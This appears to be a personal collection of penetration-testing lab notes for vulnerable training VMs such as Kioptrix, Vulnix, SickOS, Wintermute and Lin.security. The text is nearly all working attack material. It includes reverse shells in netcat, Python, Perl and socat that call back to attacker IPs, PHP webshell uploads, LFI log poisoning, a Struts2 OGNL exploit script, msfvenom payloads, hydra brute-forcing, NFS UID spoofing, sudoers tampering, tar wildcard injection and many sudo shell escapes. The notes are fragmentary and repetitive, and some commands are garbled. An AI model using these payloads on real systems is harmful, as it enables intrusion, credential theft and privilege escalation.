kioptix 2014

netdiscover -r ip nmap -p- -sV ip /pChart2.1.3/index.php - vulnerable - searcsploit lfi

Since we have an LFI and we know that the server is running Apache, let’s search for the apache config file. After checking this, I managed to find the httpd.config file.

​http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf​

usr/local/etc/apache22/httpd.conf

curl -H "User-Agent:Mozilla/4.0" http://192.168.1.68:8080​

/phptax

searchsploit phptax https://gist.githubusercontent.com/mitchmoser/75bc055ce34794cac87ea9bc97a84e89/raw/3cc6165828d75e2c63a5442edfde731fc41b8e2f/Kioptrix 2014 searchsploit phptax RCE​

$ apt-get install php7.0-curl $ php shell.php -u http://192.168.15.150:8080/phptax​

This script drops an rce.php webshell into the /phptax/data/ directory.

mkfifo pipe;nc 192.168.15.141 1234<pipe|/bin/sh>pipe 2>pipe;rm pipe

/rce.php?cmd=nc 192.168.15.141 1234 > php-reverse-shell.php

uname -a shows the host is FreeBSD 9.0 release.

nc -lvp 1234 < 26368.c

nc 192.168.15.141 1337 > 26368.c

gcc -o 26368 26368.c

===================================================

vulnix

netdiscover -r ip

nmap -p- -sS -A ip

Great, we got many services running, notables are:

Port 22: SSH Port 25: SMTP Port 79: Finger Port 110: POP3 Port 111: RPCbind Port 143: IMAP Port 512: RSH (Remote shell) Port 513: RLogin Port 514: shell?

enum4linux

nc -nv ip 25 VRFY vulnix VRFY abatchy

​http://tools.kali.org/information-gathering/smtp-user-enum​

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.72

finger [email protected]

NFS service - 2069

showmount ip

showmount -e ip

mkdir /tmp/nfs

mount -r nfs ip:/home/vulnix /tmp/nfs -nolock

gaining access through ssh

hydra -l user -P rockyou.txt ip ssh -t 4

id vulnix

useradd -u 2008 vulnix

mount -t nfs ip:/home/vulnix /tmp/mnt -nolock

Let’s generate keys for SSH so we can login into vulnix!

Steps:

Create ssh key pair by running ssh-keygen. Create .ssh directory on the mounted share /home/vulnix/.ssh. Copy the content of the public key to /home/vulnix/.ssh. SSH into [email protected]victim_ip

Also due to the fact that there’s a secure_path set, we can’t manipulate the PATH variable (except by running sudo -e which we can’t).

Let’s edit the file and update /home/vulnix so we’re able to

Restart the VM and remount the shared directory. We can upload a local exploit to gain root, or just copy /bin/bash and give it setuid permissions.

We’ll run bash with -p flag to keep the original file’s permissions.

mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt

cp /bin/bash . chmod 4777 bash

ls -al ./bash -p

=====================================================

mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3

useradd -u 2008 vulnix

ssh -i id_rsa [email protected]

By using sudoedit /etc/exports, it’s possible to add another share into the export list, one which uses the no_squash_root option; which prevents root users being remapped to the nobody user:

/home/vulnix (rw,root_squash) /root (rw,no_root_squash)

mount 192.168.22.134:/root mnt -o vers=3

=======================================================

nmap -sT -sV -A -O -v -p 1-65535 192.168.1.33

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.33

git clone https://github.com/Kan1shka9/Finger-User-Enumeration.git​

Port 111 — Enumerating RPC — rpcbind 2–4 RPC service is running, so we can enumerate further using rpcinfo. [email protected]:~# rpcinfo -p 192.168.1.33

nmap -sU -sT -p 2049 192.168.1.33

$ apt-cache search showmount nfs-common - NFS support files common to client and server $ apt-get install nfs-common

Enumeration is important, without knowing there’s a user called user you most likely won’t be able to solve this VM. Doesn’t matter which service you use, you can enumerate SMTP, Finger, NFS, …

showmount --exports 192.168.1.33 Export list for 192.168.1.33: /home/vulnix * Lets mount the remote share on our local machine. [email protected]:~# mkdir /tmp/nfs [email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs

useradd -u 2008 vulnix [email protected]:~# tail -1 /etc/passwd vulnix:x:2008:2008::/home/vulnix:/bin/sh [email protected]:~# su vulnix $ id uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) $ cd /tmp/nfs $ ls -la total 20 drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 . drwxrwxrwt 15 root root 4096 May 16 18:17 .. -rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout -rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc -rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile $ pwd /tmp/nfs

ls /root/.ssh/ [email protected]:~# ssh-keygen

[email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs [email protected]:~# cp /bin/bash /tmp/nfs/ [email protected]:~# cd /tmp/nfs/ [email protected]:/tmp/nfs# ls -la

-=======================================

mywriteup

nmap to find ports and services

smtp find usernames with enum sccripts with metasploit wordlists unix_users.txt

finger to validate users

showmount -e ip - to validate the shared follders

rpcinfo ip - to validate the running services (nfs found) 2049

now mounting the folder in to local machine but it shows access denied , as well we got the suid with other command

mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs - access denied

mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3 - got some output 2008 suid

create a ssh key and upload it on server pub key on /tmp/mnt

echo 'key' > authorized_keys

login with vulnix

*for ssh bruteforcing we did hydra bruteforce with the following commnad hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.78.130 ssh -t 4

check the user uid - id vulnix*

=======

for shell ssh -i id_rsa -l vulnix 192.168.78.130

[email protected]:/# mount -t nfs 192.168.78.130:/ -o vers=2 mount

cc614640424f5bd60ce5d5264899c3be

=========================================================

sickos

nmap -Pn ip - becuase icmp block the ip

22 80 port found this box

dirb http://ip​

test directory found

curl -X -v OPTIONS ip/test

found put,delete method working on the box

PUt file upload shell

curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://192.168.78.131/test/shell.php​

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.78.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

echo '#!/bin/bash' > update echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update

7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

mywriteup-

sickos - chkrootkit vulnerability cron jobs

nmap -Pn ip - becuase icmp block the ip

22 80 port found this box

dirb http://ip​

test directory found

curl -X -v OPTIONS ip/test

found put,delete method working on the box

PUt file upload shell

curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://192.168.78.131/test/shell.php​

curl --upload-file phpshell.php -v --url http://192.168.78.131/test/test.php -O --http1.0

with nmap script nmap -p 80 ip --script http-put --script-args http-put.url='/test/php.php' ,http-put..file='put.php'

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update - this is for add user in to sudoers list

perl -e \’use Socket;$i=”192.168.209.151″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};\’

echo “perl -e ‘use Socket;$i=\”192.168.209.151\”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'” > /tmp/update

for root - above reverse shell

with curl low priv shell

curl "http://192.168.78.131/test/shell.php?cmd=python+-c+%27import+socket%2csubprocess%2 cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%22192.168.78.128%22%2c443))%3bos.dup2(s.f ileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3b+os.dup2(s.fileno()%2c2)%3bp%3dsubprocess.call(%5b%22%2fbin%2fsh%22%2c%22- i%22%5d)%3b%27"

============================================

linux permissions r = read permission w = write permission x = execute permission

• = no permission

Number Permission Type Symbol 0 No Permission --- 1 Execute --x 2 Write -w- 3 Execute + Write -wx 4 Read r-- 5 Read + Execute r-x 6 Read +Write rw- 7 Read + Write +Execute rwx

'764' absolute code says the following:

Owner can read, write and execute Usergroup can read and write World can only read

u user/owner g group o other a all

• Adds a permission to a file or directory

• Removes the permission

  = Sets the permission and overrides the permissions set earlier.

Changing Ownership and Group For changing the ownership of a file/directory, you can use the following command:

chown user

In case you want to change the user as well as group for a file or directory use the command

chown user:group filename

User rights/Permissions The first character that I marked with an underscore is the special permission flag that can vary. The following set of three characters (rwx) is for the owner permissions. The second set of three characters (rwx) is for the Group permissions. The third set of three characters (rwx) is for the All Users permissions. Following that grouping since the integer/number displays the number of hardlinks to the file. The last piece is the Owner and Group assignment formatted as Owner:Group.

==============================================

htb wall

one method: nmap -sC -sV 10.10.10.157

dirb ip

monitoring

change request in to post method

centreon post request api/

centreon/api/index.php?action=authenticate

hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/centreon/api/index.php?action=authentication:username=^USER^&password=^PASS^:Bad Credentials" -V

python -c 'import pty; pty.spawn("/bin/bash")'

on victim attacekr mode socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

on kali listen mode socat file:tty,raw,echo=0 tcp-listen:4444

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

​https://github.com/andrew-d/static-binaries​

suid find / -perm /4000

screen 4.5.0 has suid bit

​https://www.exploit-db.com/exploits/41154​

​https://0xrick.github.io/hack-the-box/wall/​

2nd method

curl -X POST http://wall.htb/monitoring/​

wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate​

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f

​https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/​

==================================================================================

firstileaks

nmap -v -p 1-65535 -sV -O -sT 192.168.221.150

decode the image and got the password

keKkeKKeKKeKkEkkEk

PHP reverse shell The file name shell.php.png was used to bypass the web application filtering, the file was still executed as PHP (likely due to incorrectly configured Apache MIME types). A reverse shell successfully connected back to a netcat listener.

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis

cat cryptpass.py

import base64,codecs,sys

def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1]) print cryptoResult

python script to decrypt the password

import base64,codecs,sys

def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str): string = str[::-1] string = string.encode("rot13") return base64.b64decode(string)

print decodeString(sys.argv[1])

sudo -u fristi .secret_admin_stuff/doCom /bin/sh

2nd method

php reverse shell upload and get back to the nc

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis

3rd method

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.0.3",5556));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

import base64,codecs,sys

def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1]) print cryptoResult

decode string

import base64,codecs,sys

def decodeString(str): base64string= codecs.decode(str, 'rot13') return base64.b64decode(base64string[::-1])

cryptoResult=decodeString(sys.argv[1]) print cryptoResult

[[email protected] ~]$ python decryptpass.py $(cat whoisyourgodnow.txt) LetThereBeFristi! [[email protected] ~]$ su fristigod Password: bash-4.1$ whoami fristigod

sudo -u fristi ./doCom /bin/bash

import base64 in_string = "=RFn0AKnlMHMPIzpyuTI0ITG" in_string_1 = in_string[::-1] in_string_2 = in_string_1.encode("rot13") print base64.b64decode(in_string_2) LetThereBeFristi!

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

==================================================================

stapler

nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30

bash-4.1$ sudo -u fristi ./doCom whoami

​

==========================================================

11/12/2019

wintermute 1

   192.168.30.0/24              192.168.40.0/24

kali <---------------> straylight <---------------> neuromancer (.128) (.129) (.128) (.129)

nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 20 -u http://192.168.30.129/​

Hmm. What do we have here? /freeside/ looks interesting.

There’s another web-related port, 3000/tcp and ntopng is running behind it.

/turing-bolo/ has something that finally looks like an attack surface.

LFI vulnerability

PHP Injection There’s a Local File Inclusion (LFI) vulnerability with the bolo parameter in bolo.php, demonstrated below.

All four files case.log, molly.log, armitage.log, and riviera.log are available on the server, indicating the presence of the LFI vulnerability.

How can I inject PHP into the server?

A quick search in Google for “postfix log location” seems to suggest the logs are at /var/log/mail.log. This plays well into our hands because of the .log extension. Let’s explore this path of attack. ip/bolo.php?bolo=../../../../var/log/mail

<?php echo shell_exec($_GET['cmd']);?>

​http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=/var/www/html/turing-bolo/case​

nc ip 25 Helo hackerman MAIL FROM: "hackerman <?php echo shell_exec($_GET['cmd']);?>"

[email protected]:~# nc 192.168.56.102 25 220 straylight ESMTP Postfix (Debian/GNU) MAIL FROM:[email protected] 250 2.1.0 Ok RCPT TO:<?php echo system($_POST['cmd']); ?> 501 5.1.3 Bad recipient address syntax

perl -e 'use Socket;$i="192.168.30.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

After encoding

perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27

Long story short. I notice /bin/screen is a symbolic link to /bin/screen-4.5.0, which is setuid to root. Like they always say, Google is your best friend.

41154 - 4.5 screen

now move to next machine /structs2_2.3

Next Attack: Neuromancer

nc and socat are available on the machine

for port scanning

for p in $(seq 1 65535); do nc -nvzwl ip $p 2>&1; done| grep open >&1; done | grep open5); do nc -nvzw1 ip $p 2>

for port forwaring :

socat tcp-listen:8009,fork tcp:192.168.40.129:8009 &

socat tcp-listen:8080,fork tcp:192.168.40.129:8080 &

socat tcp-listen:34483,fork tcp:192.168.40.129:34483 &

netstat -plunt

from attacker machine

socat tcp-listen:4321,fork tcp:192.168.30.128:4321 &

Struts2 Showcase Remote Command Execution

exploit.sh

!/bin/bash

LHOST=192.168.30.128 LPORT=4321 RHOST=192.168.30.129 RPORT=8080 TARGETURI=struts2_2.3.15.1-showcase/integration URL=http://$RHOST:$RPORT/$TARGETURI/saveGangster.action CMD="$1" PAYLOAD="" PAYLOAD="${PAYLOAD}%{" PAYLOAD="${PAYLOAD}(#[email protected]@DEFAULT_MEMBER_ACCESS)." PAYLOAD="${PAYLOAD}(#_memberAccess?(#_memberAccess=#dm):" PAYLOAD="${PAYLOAD}((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." PAYLOAD="${PAYLOAD}(#ognlUtil=#container.getInstance(@[email protected]))." PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedPackageNames().clear())." PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedClasses().clear())." PAYLOAD="${PAYLOAD}(#context.setMemberAccess(#dm))))." PAYLOAD="${PAYLOAD}(@[email protected]().exec('$CMD'))" PAYLOAD="${PAYLOAD}}"

usage() { echo "Usage: $(basename $0) [COMMAND]" >&2 exit 1 }

if [ $# -ne 1 ]; then usage fi

curl -s -H "Referer: http://$RHOST:$RPORT/$TARGETURI/editGangster" --data-urlencode "name=$PAYLOAD" --data-urlencode "age=20" --data-urlencode "__checkbox_bustedBefore=true" --data-urlencode "description=1" -o /dev/null $URL

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.40.128 LPORT=4321 -f elf -o rev

./exploit.sh "wget -O /tmp/rev ip:port/rev"

got the shell now priv esccalation

for superior shell

ssh -i /root/keys/ta -p 34483 [email protected]

Ubuntu 16.04.04 LTS https://www.exploit-db.com/exploits/44298/​

other method

And poked around a bit until I got to http://192.168.56.102:3000/lua/flows_stats.lua​

php://filter/convert.base64-encode/resource=case

​http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=../turing-bolo/case​

​http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=/var/www/html/turing-bolo/case​

I went to http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail​

[email protected]:~# nc 192.168.56.102 25 220 straylight ESMTP Postfix (Debian/GNU) MAIL FROM:[email protected] 250 2.1.0 Ok RCPT TO:<?php echo system($_POST['cmd']); ?> 501 5.1.3 Bad recipient address syntax

[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=id"

[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=which nc"

[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"

$ python -c "import pty;pty.spawn('/bin/bash')"

[email protected]:/var/www/html/turing-bolo$ find / -perm -u=s 2>/dev/null

db.com/exploits/41154, which I saved on my machine as exploit.sh and transferred to the target

[email protected]:~# nc -nvlp 2222 < exploit.sh [email protected]:/var/www/html/turing-bolo$ cd /tmp [email protected]:/tmp$ nc 192.168.56.101 2222 > exploit.sh

Shell Hunting #2

python -c "import pty;pty.spawn('/bin/bash')"

[email protected]:/etc#

[email protected]:/tmp# for i in $(seq 1 255); do ping -c 1 192.168.212.$i; done | grep "bytes from"

[email protected]:/tmp# for i in $(seq 1 65535); do nc -nvz -w 1 192.168.212.4 $i 2>&1; done | grep -v "Connection refused"

[email protected]:/tmp# socat TCP-LISTEN:8009,fork,reuseaddr TCP:192.168.212.4:8009 & [1] 14514 [email protected]:/tmp# socat TCP-LISTEN:8080,fork,reuseaddr TCP:192.168.212.4:8080 & [2] 14521 [email protected]:/tmp# socat TCP-LISTEN:34483,fork,reuseaddr TCP:192.168.212.4:34483 & [3] 14524

[email protected]:/tmp# socat TCP-LISTEN:6666,fork,reuseaddr TCP:192.168.56.101:6666 &

[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "nc 192.168.212.3 6666 -e /bin/bash" not work

And then setup a file in /var/www/html called callback.sh which contained

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.212.3 6666 >/tmp/f

[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.212.3:8888/callback.sh -O /tmp/callback.sh"

for permission [email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/callback.sh"

fired

[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/callback.sh"

got the shell now move to priv escalation

uname -a

It wasn't there, so I downloaded the exploit to /var/www/html on my machine as priv.c and compiled it locally

[email protected]:~# gcc priv.c -o priv

$ cd /tmp $ wget http://192.168.212.3:8888/priv​

​https://blog.barradell-johns.com/index.php/2018/12/29/wintermute-one-writeup/​

​https://5h4d0wb0y.github.io/2017-05-12-the-necromancer1/​

​

====================================================================================

​

Lin.security – walkthrough

Exploiting SUDO

ash

This is a command interpreter (shell). So by running sudo ash we can get a root shell.

whoami;id

awk

AWK is a special-purposeprogramming language designed for text processing and typically used as a data extraction and reporting tool. Since we can run awk using we sudo, we can easily escalate our privileges to root.

sudo awk 'BEGIN {system("/bin/sh")}'

bash

Bash is a Unix shell and command language. As with ash we can abuse our sudo rights to privesc.

[email protected]:~$ sudo bash

sh

The Bourne shell (sh) is a shell, or command-line interpreter, for computer operating systems.

sudo sh

csh

The C shell (csh or the improved version, tcsh) is a Unix shell. As with for example sh we can use it to escalate to root.

sudo csh

curl

We can abuse curl in order to overwrite files as root. By creating a simple setuid binary on my machine, using curl to fetch the program and overwriting an already setuid binary owned by root on the target system, we can get a root shell.

Setuid binary
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

Compile this program and start a python SimpleHTTPServer and go to the victim machine and fetch the file using curl.

sudo curl 192.168.1.142/rootshell -o /bin/ping ping

dash

Dash is an acronym for Debian Almquist shell (dash). It is a Unix and Linux shell which is much smaller than bash but still aiming at POSIX-compliancy. As with sh, bash etc. we just sudo dash and get a root shell.

sudo dash

ed

ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files. But can also execute commands from inside ed. Beacuse of this, root shell is really straight forward.

sudo ed !/bin/sh

env

env is a shellcommand for Linux, Unix, and Unix-like operating systems. It can be used to print a list of the current environment variables, or to run another program in a custom environment without modifying the current one.

sudo env /bin/sh

expect

Expect is a program that "talks" to other interactive programs according to a script. Following the script, expect knows what can be expected from a program and what the correct response should be.

sudo expect -c 'spawn /bin/sh;interact' spawn /bin/sh

find

Find is a command for recursively filtering objects in the file system based on a simple conditional mechanism. You can use find to search for a file or directory on your file system. Find do also have an exec parameter which we can abuse to escalate our privileges.

sudo find . -exec /bin/sh \; -quit

ftp

By issuing the command ftp without any parameters, we can run commands from within ftp.

sudo ftp !/bin/sh

less

We can execute commands from inside less. sudo less /etc/profile !/bin/sh

man

As above, we can execute commands from inside of man.

sudo man test !/bin/sh

more

[email protected]:~$ sudo more /var/log/lastlog !/bin/sh

scp

scp allows files to be copied to, from, or between different hosts. It uses ssh for data transfer and provides the same authentication and same level of security as ssh.

[email protected]:~$ TF=$(mktemp)
[email protected]:~$ echo 'sh 0<&2 1>&2' > $TF
[email protected]:~$ chmod +x "$TF"
[email protected]:~$ sudo scp -S $TF x y:
# whoami;id

socat

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes - including giving us a root shell!

On the attacker machine: socat file:tty,raw,echo=0 tcp-listen:1337

On the victim machine: sudo socat tcp-connect:192.168.1.142:1337 exec:sh,pty,stderr,setsid,sigint,sane

ssh

We can use the ProxyCommand option to spawn an interactive shell.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

vi

As with man etc. we can execute commands from inside of vi.

sudo vi :!/bin/sh

zsh

The Z Shell or zsh is an interactive UNIX shell and powerful command-line interpreter for scripting language including shell scripting. Since it's a interactive shell we can easily get a root shell.

sudo zsh

pico

Pico is a simple, display-oriented text editor based on the pine message composer.

sudo pico ^R^X reset; sh 1>&0 2>&0

rvim

Depending on how rvim was compiled, we can spawn a root shell. In this case rvim was compiled with Python support.

sudo rvim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")

perl

Since we can use perl with sudo, we can do the following to get a root shell.

sudo perl -e 'exec "/bin/sh"

tclsh

Tclsh is a shell-like application that reads Tcl commands from its standard input or from a file and evaluates them.

sudo tclsh % exec /bin/sh <@stdin >@stdout 2>@stderr

git

We can abuse the help function of git to get code execution as root.

sudo git help statu !/bin/sh

script

Script command records a shell session for you so that you can look at the output that you saw at the time and you can even record with timing so that you can have a real-time playback. It is really useful and comes in handy in the strangest kind of times and places.

But this can obviously be abused to get a root shell.

sudo script -q /dev/null

Exploiting Crontab

Enumerating the box we find the following script running as a cronjob.

#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done

This is a backup script taking everything from a users home dir, compressing it using tar and saving it to /etc/backups.

The problem with tar is that when using wildcards an attacker can inject he's own arguments.

The following is taken from the man page (man tar):

--checkpoint[=NUMBER] display progress messages every NUMBERth record (default 10) --checkpoint-action=ACTION execute ACTION on each checkpoint

The --checkpoint-action option will specify a program that will be executed when the checkpoint is reached. Basically allowing us arbitrary command execution

echo "mkfifo /tmp/0wned; nc 192.168.1.142 1337 0</tmp/0wned | /bin/sh > /tmp/0wned 2>&1; rm /tmp/0wned" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Now we setup a listener on our machine and wait for the cronjob to execute.

nc -lvnp 1337

Stealing Credentials

Looking at the home folders we see susan. Listing all files - including hidden files - we find .secret.

[email protected]:/home/susan$ cat .secret MySuperS3cretValue!

[email protected]:/home/susan$ su - susan Password: [email protected]:~$ whoami;id susan

Setuid Weakness

Enmerating the machine for setuid binaries we find the following:

find / -perm -4000 2>/dev/null

xxd

xxd is owned by root and the setuid bit is set. By running this program we will run in the context of root, possibly giving us a way to escalate our privileges. It can however only be ran by root or members of the group "itservices" - exactly the group susan is a member of!

Let's dump /etc/shadow!

xxd /etc/shadow | xxd -r

NFS Share With R/W Permissions

Doing a nmap scan against the machine reveals that NFS is running. Let's first see if we can find any open shares which we can mount.

showmount -e 192.168.1.140

Awesome! Let's mount the share to /mnt/peter.

mount 192.168.1.140:/home/peter /mnt/peter

Looking at the UID and GID we see 1001/1005. This mean that I don't have that specific group and user on my system, so even if the share now is mounted I can't write files to the share.

To circumvent this, let's create a user with a UID of 1001 and a group with the GID 1005, and then change to that user and try to write a file.

groupadd --gid 1005 peter useradd --uid 1001 --gid 1005 peter su peter pwd

So, how do we utilize this to escalate to peter? How about generating a SSH key and adding that to peter's authorized_keys? Let's try.

Let's first generate a new SSH key.

$ ssh-keygen

Now, let's create a .ssh directory inside peter's home directory (on the share) and add the public key we just generated to authorized_keys.

pwd mkdir .ssh touch .ssh/authorized_keys cat /home/peter/.ssh/id_rsa.pub > .ssh/authorized_keys ssh [email protected]

Exploiting The Docker Group

Looking at the groups peter is added to we see docker. This is a really powerful group and there's ton of information on the internet on how to privesc using the docker group.

The Docker Hub already have an image which we can use to get a root shell, called "rootplease".

docker run -v /:/linsecurity -i -t chrisfosterelli/rootplease

===================================================================================

5th January

Zico 2.1

nmap -sVC --top-ports 10000 -T4 192.168.55.5

The end of the URL, “php?page=tools.html” looks like we could do some directory traversal with it. Let’s give it a shot and see if we can print out /etc/passwd.

LFI vulnerability http://192.168.55.5/dbadmin/test_db.php.

searchsploit phpliteadmin

create a malicious database and got the shell

../../../usr/databases/shell.php
​
 <?php system("whoami; wget http://192.168.55.4/shellme; chmod +x shellme; ./shellme"); ?>
msfvenom --platform Linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.55.4 LPORT=2501 -f elf -o shellme

python tty shell python -c 'import pty; pty.spawn("/bin/[email protected]:/$

we got the password of zico through wp-config.php

Linux kernel version 3.2.0-23 cp /usr/share/exploitdb/platforms/linux/local/40839.c .

gcc -pthread 40839.c -o dirtyroot -lcrypt

==========================================================

sickos

nmap -Pn -T4 -A ip

curl -v -X options ip/test/ - put method enabled

nmap --script http-methods --script-args http-methods.url-path="/test" 192.168.56.101

curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://ip/test/shell.php
curl --upload-file /var/www/html/shell.php -H "Expect: *" 192.168.56.101/test/shell.php

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

After this i quickly googled for any chkrootkit related exploits and found this exploit-db;

chkrootkit
ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

​https://github.com/nathunandwani/fake-shell​

2nd priv escalation

echo “perl -e ‘use Socket;\$i=\”192.168.209.151\”;\$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'” > /tmp/update

3rd priv escalation

cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
./bash -p
​

==========================================================

Sedna

check liscence files
arbitraty file upload for builderengine 
builderengine v3 exploit  for user shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
​
dirty cow for local priv escalation

================================================

DC1 walkthrough

Using nmap to find opened ports & running services.
Detecting technologies used to build web apps.
Checking robots.txt file.
Searching & using public exploits.
Uploading shell to drupal CMS.
Creating reverse shell using ncat (nc).
Privilege escalation using SUID binaries.
Collect important information from PHP configuration files.
